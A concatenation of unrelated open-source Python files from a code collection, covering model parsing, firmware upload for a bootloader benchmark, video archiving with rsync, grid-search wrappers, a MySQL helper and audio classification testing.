yield ScanBunch(precursor_scan, product_scans)
precursor_scan = packed
product_scans = []
else:
raise Exception("This object is not able to handle MS levels higher than 2")
if precursor_scan is not None:
yield ScanBunch(precursor_scan, product_scans)
def next(self):
return next(self._producer)
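# A hedged usage sketch; the DLL directory and the "sample.d" acquisition
# folder are placeholder assumptions, not paths from this module:
#
#     register_dll_dir([r"C:\Agilent\MassSpecDataReader"])  # hypothetical path
#     reader = AgilentDLoader(r"C:\data\sample.d")
#     reader.start_from_scan(index=0, grouped=True)
#     bunch = reader.next()   # first ScanBunch of (precursor, products)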
| 0.980469 | 1 |
tests/utils.py | amatissart/idunn | 0 | 26884 | <gh_stars>0
from contextlib import contextmanager
from copy import deepcopy
from app import settings
@contextmanager
def override_settings(overrides):
"""
A utility function used by some fixtures to override settings
"""
old_settings = deepcopy(settings._settings)
settings._settings.update(overrides)
try:
yield
finally:
settings._settings = old_settings
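# A short usage sketch (not in the original file; "EXAMPLE_FLAG" is a
# made-up key used purely for illustration):
def _example_override():
    with override_settings({"EXAMPLE_FLAG": True}):
        assert settings._settings["EXAMPLE_FLAG"] is True
    # on exit, the previous settings mapping is restored
    assert "EXAMPLE_FLAG" not in settings._settings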
| 1.148438 | 1 |
bdt2cpp/XGBoostParser.py | bixel/bdt2cpp | 3 | 27012 | import re
from .Node import Node
class XGBoostNode(Node):
FLOAT_REGEX = '[+-]?\d+(\.\d+)?([eE][+-]?\d+)?'
BRANCH_REGEX = re.compile(f'(?P<branch>\d+):\[(?P<feature>\w+)(?P<comp><)(?P<value>{FLOAT_REGEX})\]')
LEAF_REGEX = re.compile(f'(?P<leaf>\d+):leaf=(?P<value>{FLOAT_REGEX})')
FEATURE_REGEX = re.compile('\w(?P<id>\d+)')
def __init__(self, parent=None, line='', feature_index_dict=None):
super().__init__(parent=parent)
# propagate any feature index dict
self.feature_index_dict = None
if feature_index_dict or parent:
self.feature_index_dict = feature_index_dict or parent.feature_index_dict
match_leaf = self.LEAF_REGEX.search(line)
if match_leaf:
self.weight = float(match_leaf.groupdict().get('value'))
self.final = True
else:
self.weight = 0
self.final = False
match_branch = self.BRANCH_REGEX.search(line)
if match_branch:
self.cut_value = float(match_branch.groupdict().get('value'))
self.feature = match_branch.groupdict().get('feature')
if self.feature_index_dict:
self.feature_index = self.feature_index_dict[self.feature]
else:
feature_match = self.FEATURE_REGEX.search(self.feature)
if not feature_match:
raise ValueError(f'Feature {self.feature} needs to be '
'matched with its correct position in the feature '
'value vector. Please give a list of feature names'
' in the correct order with `--feature-names`.')
self.feature_index = feature_match.groupdict().get('id')
else:
self.cut_value = None
self.feature = None
self.feature_index = None
def get_feature_names(lines):
features = set()
for l in lines:
match_branch = XGBoostNode.BRANCH_REGEX.search(l)
if match_branch:
features.add(match_branch.groupdict().get('feature'))
return features
def parse_model(filename, feature_names):
trees = []
with open(filename, 'r') as f:
lines = f.readlines()
# build the feature name dict if neccessary
if feature_names:
# check that the feature names are in line with the names found in
# the tree
if not set(feature_names) >= get_feature_names(lines):
raise ValueError('The given feature names do not properly describe '
'the features found in the model. Please check that your '
'argument for `--feature-names` is a proper superset of the '
'feature names used in the model.\nThese features have been '
f'found in the model:\n{" ".join(get_feature_names(lines))}')
feature_index_dict = {name: i for i, name in enumerate(feature_names)}
else:
feature_index_dict = None
node = None
for i, line in enumerate(lines):
# save finished tree
if line.startswith('booster'):
if node:
trees.append(node.root)
node = None
continue
# start a new tree
if node is None:
node = XGBoostNode(line=line, feature_index_dict=feature_index_dict)
continue
# move upwards if a leaf is reached
while node.final or (node.parent and node.left and node.right):
node = node.parent
# fill left and right leaf
if not node.left:
node.left = XGBoostNode(parent=node, line=line)
node = node.left
continue
if not node.right:
node.right = XGBoostNode(parent=node, line=line)
node = node.right
continue
trees.append(node.root)
return trees
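# A hedged usage sketch; the dump file name and feature list are assumptions.
# A compatible text dump can be produced with xgboost's Booster.dump_model:
#
#     trees = parse_model('model.dump', feature_names=['f0', 'f1', 'f2'])
#     print(len(trees), 'trees; first root cut value:', trees[0].cut_value)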
| 1.84375 | 2 |
1005.py | TheLurkingCat/TIOJ | 1 | 27140 | <filename>1005.py
from itertools import combinations
from math import gcd, sqrt
a = int(input())
while a:
s = set()
total = 0
coprime = 0
for _ in range(a):
s.add(int(input()))
for (x, y) in combinations(list(s), 2):
total += 1
if gcd(x, y) == 1:
coprime += 1
try:
print('{:.6f}'.format(sqrt(6 * total / coprime)))
except ZeroDivisionError:
print('No estimate for this data set.')
a = int(input())
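# Why sqrt(6 * total / coprime) estimates pi: the probability that two random
# integers are coprime is 6 / pi**2, so coprime/total approximates 6/pi**2 and
# pi is approximately sqrt(6 * total / coprime). For example, if 608 of 1000
# pairs are coprime, the estimate is sqrt(6 * 1000 / 608) ~= 3.1414.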
| 2.328125 | 2 |
dev_tools/scan_inclusions.py | frannuca/quantlib | 0 | 27268 | import os, sys, re, string
import xml.dom.minidom
import xml.dom.ext
QL_ROOT = "C:/Projects/QuantLibSVN/trunk/"
VC8 = "C:/Program Files/Microsoft Visual Studio 8/"
BOOST = "C:/Boost/boost_1_33_1/"
QL = QL_ROOT +"QuantLib/"
QL_ADDIN = QL_ROOT + "QuantLibAddin/"
OBJECT_HANDLER = QL_ROOT + "ObjectHandler/"
QL_XL = QL_ROOT + "QuantLibXL/"
STD = VC8 + "VC/include/"
SDK = VC8 + "VC/PlatformSDK/Include"
INCLUDE_PATH = [QL, QL_ADDIN, OBJECT_HANDLER, QL_XL, BOOST, STD, SDK]
PREFIX_PATH = ["ql", "qlo", "oh", "boost", "qlxl", "ohxl", "xlsdk"]
class MyError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def searchAndParseHeaderFile(fileName):
for includePath in INCLUDE_PATH:
filePath = includePath + fileName[0].lower() + fileName[1:]
if os.path.isfile(filePath):
return parseHeaderFile(filePath)
filePath = includePath + fileName[0].upper() + fileName[1:]
if os.path.isfile(filePath):
return parseHeaderFile(filePath)
raise MyError("searchAndParseHeaderFile: " + fileName + " not found")
def getFilePrefix(include):
for prefix in PREFIX_PATH:
if re.match(prefix + '/.*',include):
return prefix
return "std"
def parseHeaderFile(filePath):
includes = []
nbLines = 0
f=open(filePath)
for line in f:
nbLines +=1
if not re.match("//", line):
includesLines = re.findall('^#include.*<.*>', line)
if includesLines:
includeName = re.findall('<.*>', includesLines[0])[0][1:-1]
includes.append(includeName)
f.close()
return includes, nbLines
def walkThroughIncludesFiles(fileName, files, filesCounters, node, document):
new = document.createElement('header')
node.appendChild(new)
parsingResults = searchAndParseHeaderFile(fileName)
includes = parsingResults[0]
attribute = "%i" % parsingResults[1]
new.setAttribute('nbLines', attribute)
nbLines = parsingResults[1]
for include in includes:
#if the son is not recorded yet we explore it
include = "%s" % include
if not files.count(include) > 0:
files.append(include)
try:
prefix = getFilePrefix(include)
filesCounters[prefix][0] +=1
result = walkThroughIncludesFiles(include, files, filesCounters, new, document)
nbLines += result[0]
filesCounters[prefix][1] += result[1]
except MyError, e:
print e.value, " in : " + fileName
attribute = "%i" % nbLines
new.setAttribute('total', attribute)
new.setAttribute('name', fileName)
return int(nbLines), parsingResults[1]
def trackDependencies(fileName):
document = xml.dom.minidom.Document()
filesCounters = {}
filesCounters["boost"] = [0,0]
filesCounters["ql"] = [0,0]
filesCounters["qlo"] = [0,0]
filesCounters["qlxl"] = [0,0]
filesCounters["oh"] = [0,0]
filesCounters["ohxl"] = [0,0]
filesCounters["xlsdk"] = [0,0]
filesCounters["std"] = [0,0]
files = []
files.append(fileName)
nbLines = walkThroughIncludesFiles(fileName, files, filesCounters, document, document)
return filesCounters, document, nbLines, files
if __name__ == '__main__':
if len(sys.argv) != 2:
print 'Give the relative path of the file you want to scan (wrt to the included folders)'
sys.exit()
args = sys.argv[1:]
fileName = args[0]
result = trackDependencies(fileName)
nbLinesParsed = result[2][0]
print "number of files parsed ", len(result[3])
print "number of lines parsed ", nbLinesParsed
namespaces = result[0]
for namespace in namespaces:
print namespace, ":\tnb Files ", namespaces[namespace][0]
print "\tnb lines ", namespaces[namespace][1]
print "\t%(nbLines)02d" % {'nbLines': float(namespaces[namespace][1])/nbLinesParsed * 100}, "%"
outputName = fileName.replace("/", "-") + ".xml"
output = "./" + outputName
f=open(output, 'w')
xml.dom.ext.PrettyPrint(result[1], f)
f.close()
print "result saved in ", outputName
| 1.484375 | 1 |
erpnext/utilities/__init__.py | nagendrarawat/erpnext_custom | 2 | 27396 | ## temp utility
from __future__ import print_function
import frappe
from erpnext.utilities.activation import get_level
from frappe.utils import cstr
def update_doctypes():
for d in frappe.db.sql("""select df.parent, df.fieldname
from tabDocField df, tabDocType dt where df.fieldname
like "%description%" and df.parent = dt.name and dt.istable = 1""", as_dict=1):
dt = frappe.get_doc("DocType", d.parent)
for f in dt.fields:
if f.fieldname == d.fieldname and f.fieldtype in ("Text", "Small Text"):
print(f.parent, f.fieldname)
f.fieldtype = "Text Editor"
dt.save()
break
def get_site_info(site_info):
# called via hook
company = frappe.db.get_single_value('Global Defaults', 'default_company')
domain = None
if not company:
company = frappe.db.sql('select name from `tabCompany` order by creation asc')
company = company[0][0] if company else None
if company:
domain = frappe.db.get_value('Company', cstr(company), 'domain')
return {
'company': company,
'domain': domain,
'activation': get_level()
}
| 1.46875 | 1 |
timemachines/skaters/orbt/orbitlgtskaterfactory.py | iklasky/timemachines | 253 | 27524 |
from timemachines.skaters.orbt.orbitinclusion import using_orbit
if using_orbit:
from timemachines.skaters.orbt.orbitwrappers import orbit_lgt_iskater
from timemachines.skatertools.utilities.conventions import Y_TYPE, A_TYPE, R_TYPE, E_TYPE, T_TYPE
from timemachines.skatertools.batch.batchskater import batch_skater_factory
def orbit_lgt_skater_factory(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None,
emp_mass=0.0,
seasonality=None):
return batch_skater_factory(y=y, s=s, k=k, a=a, t=t, e=e, r=r, emp_mass=emp_mass,
iskater=orbit_lgt_iskater,
iskater_kwargs={'seasonality': seasonality},
min_e=0, n_warm=20)
def orbit_lgt_12(y,s,k,a=None, t=None,e=None):
return orbit_lgt_skater_factory(y=y, s=s, k=k, a=a,t=t,e=e, seasonality=12)
def orbit_lgt_24(y,s,k,a=None, t=None,e=None):
return orbit_lgt_skater_factory(y, s, k, a=a,t=t,e=e, seasonality=24)
| 1.390625 | 1 |
benchmarks/secure_data_SDK-benchmarks/bootloader/load_firmware.py | ghsecuritylab/BenchIoT | 22 | 27652 |
from struct import pack, unpack
import binascii
import socket
HOST = '192.168.0.10'
PORT = 1337
BUFF_SIZE = 1024
START_TOKEN = "init"
DONE_TOKEN = "<PASSWORD>"
FAIL_TOKEN = "<PASSWORD>"
def create_test_application(load_addr=0x08002000, size=64*1024):
'''
Creates a test application that simply returns to the bootloader.
Creates and ISR Table that point to a infinte loop, except reset
vector that points to two instructions
' mov sp, r3'
' bx lr'
'''
SP_ADDR = 0x20050000 # Address of stack for loaded application
fw_list = []
fw_list.append(pack("<I",SP_ADDR))
fw_list.append(pack("<I",load_addr+1025))
# build rest of ISR
for isr in xrange(2,256):
fw_list.append(pack("<I",load_addr+1029)) # 4 bytes after end of ISR
# Add Code
fw_list.append('\x9d\x46\x70\x47') # mov sp,r3; bx lr
fw_list.append('\xfe\xbf\xff\xf7') # b.w
# Fill rest with garbage
i = 0
#TODO when bootloader does check sum update to be random data
while (len(fw_list)< size / 4):
fw_list.append(pack("<I",i))
i += 1
return ''.join(fw_list)
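# Offset arithmetic behind the constants above: the vector table holds 256
# entries of 4 bytes each (1024 bytes), so the reset handler's code starts at
# load_addr + 1024 and the infinite-loop stub at load_addr + 1028; the extra
# +1 in 1025/1029 sets the Thumb bit that Cortex-M branch targets require.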
def tx(filename):
with open(filename,'rb') as fw_file:
fw_data = fw_file.read()
tx_data(fw_data)
def tx_data(fw_data):
client = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
client.settimeout(50)
client.connect(( HOST, PORT ))
client.settimeout(None)
print "Sending Start Token:", START_TOKEN
client.send(START_TOKEN)
data = client.recv(len(START_TOKEN))
if data and data == START_TOKEN:
print "Got Start Token:", data
client.send(pack("<I", len(fw_data)))
print "Sent Length: ", len(fw_data)
print "Sending FW: ", len(fw_data)
for i in xrange(0,len(fw_data), 128):
client.send(fw_data[i:i+128])
data = client.recv(len(DONE_TOKEN))
if data and data == DONE_TOKEN:
print "Sent Successfully, Token: ", data
else:
print "Transmission Failed, Token: ", data
def rx():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', PORT))
s.listen(1)
conn, addr = s.accept()
print 'Connection address:', addr
data = conn.recv(5)
print data
if (data and data == START_TOKEN):
conn.send(START_TOKEN)
data = conn.recv(4)
size = unpack('<I', data)[0]
print "Size: ",size
received_count = 0
with open("outfile.bin",'wb') as outfile:
while (received_count < size):
request = size - received_count
if request > BUFF_SIZE:
request = BUFF_SIZE
data = conn.recv(request)
if (data):
received_count += len(data)
print "Received %i: %s..."% (len(data),
binascii.hexlify(data[0:10]))
outfile.write(data)
else:
print ("Failed")
conn.send(FAIL_TOKEN)
conn.close()
return
conn.send(DONE_TOKEN) # echo
print "Done"
else:
conn.send(FAIL_TOKEN)
conn.close()
if __name__ == "__main__":
from argparse import ArgumentParser
arg_parser = ArgumentParser()
arg_parser.add_argument('-f','--filename',metavar="FILE",
help='Firmware file to transmit (use ' + \
'arm-none-eabi-objcopy -O binary <file.elf> <outfile>)')
arg_parser.add_argument('--start_addr', default=0x08020000, type=int,
help='Start Address for generated test firmware')
arg_parser.add_argument('--size', default=16*1024, type=int,
help='Size of generated firmware to transmit')
args = arg_parser.parse_args()
#
if args.filename:
tx(args.filename)
else:
fw_data = create_test_application(args.start_addr, args.size)
with open('gen_fw.bin', 'wb') as outfile:
outfile.write(fw_data)
tx_data(fw_data)
| 1.75 | 2 |
Problemset/rotate-array/rotate-array.py | KivenCkl/LeetCode | 7 | 27780 |
# @Title: 旋转数组 (Rotate Array)
# @Author: KivenC
# @Date: 2019-03-14 16:57:56
# @Runtime: 124 ms
# @Memory: 13.4 MB
class Solution:
def rotate(self, nums: List[int], k: int) -> None:
"""
Do not return anything, modify nums in-place instead.
"""
'''
k = k % len(nums)
while k > 0:
num = nums.pop()
nums.insert(0, num)
k -= 1
'''
k = k % len(nums)
if k > 0:
nums.reverse()
nums[:k] = reversed(nums[:k])
nums[k:] = reversed(nums[k:])
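# Worked trace of the three-reversal trick for nums = [1,2,3,4,5,6,7], k = 3:
# reverse all -> [7,6,5,4,3,2,1]; reverse first k -> [5,6,7,4,3,2,1];
# reverse the rest -> [5,6,7,1,2,3,4], i.e. the array rotated right by 3.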
| 2.171875 | 2 |
script/sklearn_like_toolkit/warpper/wrapperGridSearchCV.py | demetoir/MLtools | 0 | 27908 | <reponame>demetoir/MLtools<gh_stars>0
from sklearn import model_selection
from sklearn.externals.joblib import Parallel
from tqdm import tqdm
from script.sklearn_like_toolkit.warpper.base.MixIn import ClfWrapperMixIn, MetaBaseWrapperClfWithABC
import multiprocessing
CPU_COUNT = multiprocessing.cpu_count()
# TODO: using pactools.grid_search.GridSearchCVProgressBar raises a warning,
# but the same code copied inline below works fine; unclear why.
# from pactools.grid_search import GridSearchCVProgressBar as _GridSearchCVProgressBar
class GridSearchCVProgressBar(model_selection.GridSearchCV):
"""Monkey patch Parallel to have a progress bar during grid search"""
def _get_param_iterator(self):
"""Return ParameterGrid instance for the given param_grid"""
iterator = super(GridSearchCVProgressBar, self)._get_param_iterator()
iterator = list(iterator)
n_candidates = len(iterator)
cv = model_selection._split.check_cv(self.cv, None)
n_splits = getattr(cv, 'n_splits', 3)
max_value = n_candidates * n_splits
class ParallelProgressBar(Parallel):
def __call__(self, iterable):
# tqdm takes `total`/`desc` (progressbar2's `max_value`/`title` would raise
# a TqdmKeyError); wrap the iterable so the bar advances per dispatched fit
iterable = tqdm(iterable, total=max_value, desc='GridSearchCV')
return super(ParallelProgressBar, self).__call__(iterable)
# Monkey patch
model_selection._search.Parallel = ParallelProgressBar
return iterator
class wrapperGridSearchCV(GridSearchCVProgressBar, ClfWrapperMixIn, metaclass=MetaBaseWrapperClfWithABC):
def __init__(self, estimator, param_grid, scoring=None, fit_params=None, n_jobs=CPU_COUNT, iid=True, refit=True,
cv=None, verbose=0, pre_dispatch='2*n_jobs', error_score='raise', return_train_score="warn"):
GridSearchCVProgressBar.__init__(
self, estimator, param_grid, scoring, fit_params, n_jobs, iid, refit, cv, verbose, pre_dispatch,
error_score, return_train_score)
ClfWrapperMixIn.__init__(self)
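# A hedged usage sketch (the estimator and grid are illustrative, not taken
# from this module):
#
#     from sklearn.tree import DecisionTreeClassifier
#     search = wrapperGridSearchCV(DecisionTreeClassifier(),
#                                  param_grid={'max_depth': [2, 4, 8]}, cv=3)
#     search.fit(X, y)   # a tqdm bar tracks candidate x fold evaluations
#     print(search.best_params_)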
| 1.53125 | 2 |
models/__init__.py | dudtjakdl/OpenNMT-Korean-To-English | 1,491 | 28036 | from .EncoderRNN import EncoderRNN
from .DecoderRNN import DecoderRNN
from .TopKDecoder import TopKDecoder
from .seq2seq import Seq2seq
| 0.451172 | 0 |
videoarchiver.py | yannisHD/StreamRecorder | 0 | 28164 | <reponame>yannisHD/StreamRecorder
#!/usr/bin/python
"""A concise tool for archiving video as it is recorded.
"""
import os, time, argparse
import subprocess32 as subprocess
from socket import gethostname
import dvrutils
def read_archive_config(fName):
with open(fName, 'r') as f:
flines = f.readlines()
streams = [] # [{'StreamName': <name>, 'VideoPath': <path>, 'ArchivePath': <path>},...]
for line in flines:
if line[0] != '#': # ignore comment lines
sName = line.split('#')[0].strip() if '#' in line else line.strip()
if len(sName) > 0:
streams.append({'StreamName': sName, 'VideoPath': '', 'ArchivePath': ''})
return streams
class StreamArchiver:
def __init__(self, logger, dvrName, streamListFile='videoarchiver.cfg', storagePath='/mnt/video', archivePath='/mnt/archive'):
self.logger = logger
self.dvrName = dvrName
self.streamListFile = os.path.join(archivePath,streamListFile)
self.storagePath = storagePath
self.archivePath = archivePath
if os.path.exists(self.streamListFile):
self.streams = read_archive_config(self.streamListFile)
self.check_directories()
else:
self.logger.error("The specified configuration file {} cannot be found!".format(self.streamListFile))
def check_directories(self):
# check which streams this computer has and make sure the directories are set up right
goodStreams = []
for s in self.streams:
s['VideoPath'] = os.path.join(self.storagePath,s['StreamName'])
if os.path.isdir(s['VideoPath']): # if we have this stream
#s['ArchivePath'] = os.path.join(self.archivePath,s['StreamName'])
s['ArchivePath'] = self.archivePath
if not os.path.isdir(s['ArchivePath']): # if the stream has no directory in the archive, then make it
if os.path.exists(s['ArchivePath']):
s['ArchivePath'] = dvrutils.get_unique_filename(s['ArchivePath'],nZeros=0) # if there is a file with the same name for whatever reason, change the directory name
os.makedirs(s['ArchivePath'])
if self.logger is not None:
self.logger.info('Created directory {} for stream {}!'.format(s['ArchivePath'],s['StreamName']))
goodStreams.append(s)
else: # if we don't, give a debug message for the user
if self.logger is not None:
self.logger.debug("Ignoring stream {} as it does not exist on this system.".format(s['StreamName']))
self.streams = goodStreams
def sync_streams(self):
# sync the streams one at a time to minimize fragmentation (NOTE: Eventually this will be pull-based, so there will be no fragmentation)
for s in self.streams:
# use rsync to perform the copy
syncCmd = ['rsync', '-rlptg', s['VideoPath'], s['ArchivePath']] # r = recurse; l = symlinks as symlinks; preserve: p = permissions, t = modification times, g = group
if self.logger is not None:
self.logger.info("Syncing video for stream {} in {} to archive at {}...".format(s['StreamName'], s['VideoPath'], s['ArchivePath']))
self.logger.debug("Syncing with the command: {}".format(syncCmd))
startTime = time.time()
subprocess.call(syncCmd)
elapsedTime = time.time() - startTime
if self.logger is not None:
self.logger.info("Sync for stream {} took {} seconds.".format(s['StreamName'], elapsedTime))
def start_sync_daemon(self, timeOfDay='1:00'):
# repeatedly sync streams on a schedule as determined by the timeOfDay parameter
# timeOfDay is a time string in HH:MM format
# by default it will sync at 1:00 AM every day
try:
syncHour, syncMin = [int(t) for t in timeOfDay.split(':')]
except:
syncHour, syncMin = 1, 0 # use default if the user input an incorrect time string
self.logger.warning("Invalid time string: '{}'! Reverting to default! This is probably not what you wanted!".format(timeOfDay))
self.logger.info("Going to sync daily at {}:{}".format(syncHour, syncMin))
self.syncHistory = {int(time.strftime('%Y%m%d')): False} # save a log to know if we have synced today or not
while True:
dayKey = int(time.strftime('%Y%m%d'))
if dayKey not in self.syncHistory: # if this is a new day, put an entry in the log so we know that it's a new day and we need to watch for the sync time
self.syncHistory.update({dayKey: False})
if not self.syncHistory[dayKey]: # if we haven't synced yet today, check the time to see if we should
currTime = time.localtime()
syncNow = False
if currTime.tm_hour > syncHour:
syncNow = True
elif currTime.tm_hour == syncHour and currTime.tm_min >= syncMin:
syncNow = True
if syncNow: # if we should, sync files and log the event
self.sync_streams()
self.syncHistory[dayKey] = True
# if we already synced today, we don't need to do anything
time.sleep(5)
if __name__ == "__main__":
# parse any arguments passed in
parser = argparse.ArgumentParser(prog='videoarchiver.py', usage='%(prog)s [configFilename]', description='Archives/backs up video from predefined camera streams to a defined location.')
parser.add_argument('streamListFile', help = '(Optional) Name of the configuration file defining streams to back up (defaults to archivePath/dvrName).')
parser.add_argument('-t', '--time-of-day', dest = 'timeOfDay', default = '1:00', help = '(Optional) Time of day to perform the backup (HH:MM, 24-hour format) (default: %(default)s).')
parser.add_argument('-l', '--log-file', dest = 'logFilename', default = None, help = '(Optional) Name of the file for logging (defaults to archivePath/dvrName.log).')
parser.add_argument('-v', '--loglevel', dest = 'loglevel', default = 'INFO', help = '(Optional) streamrecorder log level (does not affect FFMPEG log level). Specify numeric values (10, 20, 30, etc.) or strings like DEBUG or WARNING')
parser.add_argument('-s', '--storage-path', dest = 'storagePath', default = '/mnt/video', help = '(Optional) Location of the archive directory (default: %(default)s).')
parser.add_argument('-a', '--archive-path', dest = 'archivePath', default = '/mnt/archive', help = '(Optional) Location of the archive directory (default: %(default)s).')
parser.add_argument('-d', '--dvr-name', dest = 'dvrName', default = gethostname(), help = '(Optional) Name of the computer recording the stream (defaults to hostname: %(default)s).')
args = parser.parse_args()
# setup logging
logFilePath = os.path.join(args.archivePath, "{}.log".format(args.dvrName)) if args.logFilename is None else args.logFilename # by default, log to file: archivePath/dvrName.log
logger = dvrutils.setup_logging(logFilePath, args.loglevel, args.dvrName, logToFile=True, logToStdout=True) # this function will output the loglevel for verification
try:
# create the archiver object, which makes sure things are set up correctly
streamArchiver = StreamArchiver(logger, args.dvrName, args.streamListFile, args.storagePath, args.archivePath)
# start the daemon
streamArchiver.start_sync_daemon(args.timeOfDay)
except:
# if there was a crash, log it
# TODO: send an email alert (once it works)
logger.error("The program crashed unexpectedly!")
| 2.078125 | 2 |
src/test.py | chatdip98/Acoustic-Scene-Classification | 0 | 28292 | #------testing the trained model and ensemble weights on the test data to get the final accuracy
#importing required libraries and modules
import os
import sys
import cv2
import numpy as np
from preprocess import Preprocess
from data_split import Load
from conv_net import CNN
from ensemble import Ensemble
def load_numpy_data(arg, folder):
#loading the numpy data (.npy files) from the required directory
X_test = list(np.load('bin/'+folder+'/'+arg+'/X_test.npy'))
Y_test = list(np.load('bin/'+folder+'/'+arg+'/Y_test.npy'))
X_test = list(np.array(X_test).reshape(-1, 128, 431))
Y_test = list(np.array(Y_test).reshape(-1, 15))
return X_test, Y_test
def predict_test(arg, X_train, X_val, X_test, Y_train, Y_val, Y_test):
#loading the model and training its corresponding SVR classifier
data_size = 'full'
neural_net = CNN()
model = neural_net.create_1ConvModel()
model.load('DNN/'+data_size+'/'+arg+'.model')
#defining an ensemble class and training the SVR for the particular classifier
en = Ensemble()
en.regressor(arg, model, X_val[0], Y_val[0])
neural_net.predict_test_data(arg, model, X_test[0], Y_test[0])
if __name__ == '__main__':
feature = ['mono', 'left', 'right', 'mid', 'side', 'harmonic', 'percussive', 'mfcc'] #all the features used in the architecture
X_test = [0 for i in range(len(feature))]
Y_test = [0 for i in range(len(feature))]
for i in range(8):
X_test[i], Y_test[i] = load_numpy_data(feature[i], 'full')
en = Ensemble()
#uncomment whichever method you want to use in your ensemble(SVR or majority voting)
acc = en.result_SVR(X_test, Y_test)
#acc = en.result_majority_voting(X_test, Y_test)
print("Ensemble Test Accuracy =", acc, '%')
| 2 | 2 |
common/sqlmanager.py | ntcat/tilde | 1 | 28420 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
__title__ = ''
__author__ = 'shen.bas'
__time__ = '2018-01-26'
"""
import pymysql
class SQLManager:
def __init__(self, dbCnfig):
self.DB_CONFIG = dbCnfig
self.conn = None
self.cursor = None
self.msg = ''
self.affect_rows = 0
if not self.connect():
exit() #连接失败,退出
def connect(self):
try:
if len(self.DB_CONFIG) == 0:
self.msg = '数据库连接串为空,检查server、conn标签参数。\n'
return False
else:
self.conn = pymysql.connect(host=self.DB_CONFIG['host'],
port=int(self.DB_CONFIG['port']),
user=self.DB_CONFIG['user'],
passwd=self.DB_CONFIG['passwd'],
db=self.DB_CONFIG['db'],
charset=self.DB_CONFIG['charset'])
self.cursor = self.conn.cursor(cursor=pymysql.cursors.DictCursor)
return True
except Exception as e:
print('\nmysql connect failed:\n',str(e))
return False
# 查询多条数据
def get_list(self, sql, args=None):
self.cursor.execute(sql, args)
result = self.cursor.fetchall()
return result
# 查询单条数据
def get_one(self, sql, args=None):
try:
self.cursor.execute(sql, args)
result = self.cursor.fetchone()
return result
except Exception as e:
self.msg = str(e)
return False
    # Execute a single SQL statement (e.g. UPDATE or DELETE)
    def modify(self, sql, args=None):
        self.cursor.execute(sql, args)
        self.affected_rows = self.cursor.rowcount
        self.conn.commit()
    # Insert a single record and return its auto-generated id
def create(self, sql, args=None):
self.cursor.execute(sql, args)
self.conn.commit()
last_id = self.cursor.lastrowid
return last_id
    # Close the database cursor and connection
def close(self):
self.cursor.close()
self.conn.close()
    # Called automatically when entering a with block
def __enter__(self):
return self
    # Called automatically when leaving a with block
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
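
# Minimal usage sketch (hypothetical connection values -- adjust for your server).
# Because SQLManager implements __enter__/__exit__, the with statement closes the
# cursor and connection automatically.
if __name__ == '__main__':
    demo_config = {'host': '127.0.0.1', 'port': 3306, 'user': 'root',
                   'passwd': '<PASSWORD>', 'db': 'test', 'charset': 'utf8'}
    with SQLManager(demo_config) as db:
        print(db.get_one('SELECT NOW() AS now'))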
| 2.09375 | 2 |
resilient-circuits/resilient_circuits/__init__.py | COLDTURNIP/resilient-python-api | 28 | 28548 | <gh_stars>10-100
# (c) Copyright IBM Corp. 2010, 2018. All Rights Reserved.
import pkg_resources
try:
__version__ = pkg_resources.get_distribution(__name__).version
except pkg_resources.DistributionNotFound:
__version__ = None
from .actions_component import ResilientComponent
from .action_message import ActionMessageBase, ActionMessage, \
FunctionMessage, FunctionResult, FunctionError, \
StatusMessage, BaseFunctionError
from .decorators import function, inbound_app, app_function, handler, required_field, required_action_field, defer, debounce
from .actions_test_component import SubmitTestAction, SubmitTestFunction, SubmitTestInboundApp
from .app_function_component import AppFunctionComponent
| 0.996094 | 1 |
game/Tableros.py | GeinerGV/TS1_ProyectoFinal | 0 | 28676 | <gh_stars>0
from pygame import sprite, surface, Color
from game.Bloques import CeldasTablero
from game.Snake import Snake
class AreaTablero(sprite.Sprite):
def __init__(self, size, pos, bgcolor, estructura = None):
sprite.Sprite.__init__(self)
self.image = surface.Surface(size)
self.image.fill(Color(bgcolor))
self.rect = self.image.get_rect()
self.rect.move_ip(pos)
self.tableroCnt = TableroCnt()
tablero = Tablero([42, 48], size, estructura)
self.tableroCnt.add(tablero)
# self.tableroCnt.add(Snake(tablero, 0, pos=(3,0)))
self.tableroCnt.draw(self.image)
# print(sprite.groupcollide(tablero.celdas.filas[2], tablero.celdas.columnas[3], False, False))
self.actualizar = False
def update(self, *args):
self.tableroCnt.update(*args)
class TableroCnt(sprite.GroupSingle):
pass
class Tablero(sprite.Sprite):
    def __init__(self, rangoCelda, maxSize, estructura=None):
        sprite.Sprite.__init__(self)
        estructura = estructura or dict()  # avoid a shared mutable default and handle None from AreaTablero
self.rangeSize = (rangoCelda[0], rangoCelda[1])
self.sizeCelda = self.rangeSize[0]
self.dimension = (int(maxSize[0]/self.sizeCelda), int(maxSize[1]/self.sizeCelda))
color = estructura["color"] if "color" in estructura else dict()
bgcolor = color.pop("0") if len(color) and "0" in color else "gray"
self.celdas = CeldasTablero(self.sizeCelda, self.dimension, colors=color, estructura=estructura["celdas"] if "celdas" in estructura else None)
del color
sizeSurf = tuple(map(lambda val: val*self.sizeCelda, self.dimension))
self.image = surface.Surface(sizeSurf)
self.image.fill(Color(bgcolor))
del sizeSurf, bgcolor
self.celdas.draw(self.image)
self.rect = self.image.get_rect()
self.rect.center = (int(maxSize[0]/2), int(maxSize[1]/2))
        # Draw the snake
self.snake = Snake(self, 0, pos=(5,5), velocidad=estructura["vel"] if "vel" in estructura else None)
self.snake.draw(self.image)
def update(self, *args):
self.snake.update(*args) | 2.515625 | 3 |
test_project/test_app/urls.py | ninemoreminutes/django-trails | 2 | 28804 | <reponame>ninemoreminutes/django-trails<filename>test_project/test_app/urls.py<gh_stars>1-10
# Django
from django.urls import re_path
# Test App
from .views import index
urlpatterns = [
re_path(r'^$', index, name='index'),
]
| 1.054688 | 1 |
prototype/ukwa/lib/sip/ids.py | GilHoggarth/ukwa-manage | 1 | 28932 | <reponame>GilHoggarth/ukwa-manage<gh_stars>1-10
#!/usr/bin/env python
"""
Generic methods used for verifying/indexing SIPs.
"""
from __future__ import absolute_import
import re
import logging
import tarfile
import hdfs
from lxml import etree
from StringIO import StringIO
# import the Celery app context
#from crawl.celery import app
#from crawl.celery import cfg
HDFS_URL='http://hdfs:14000'
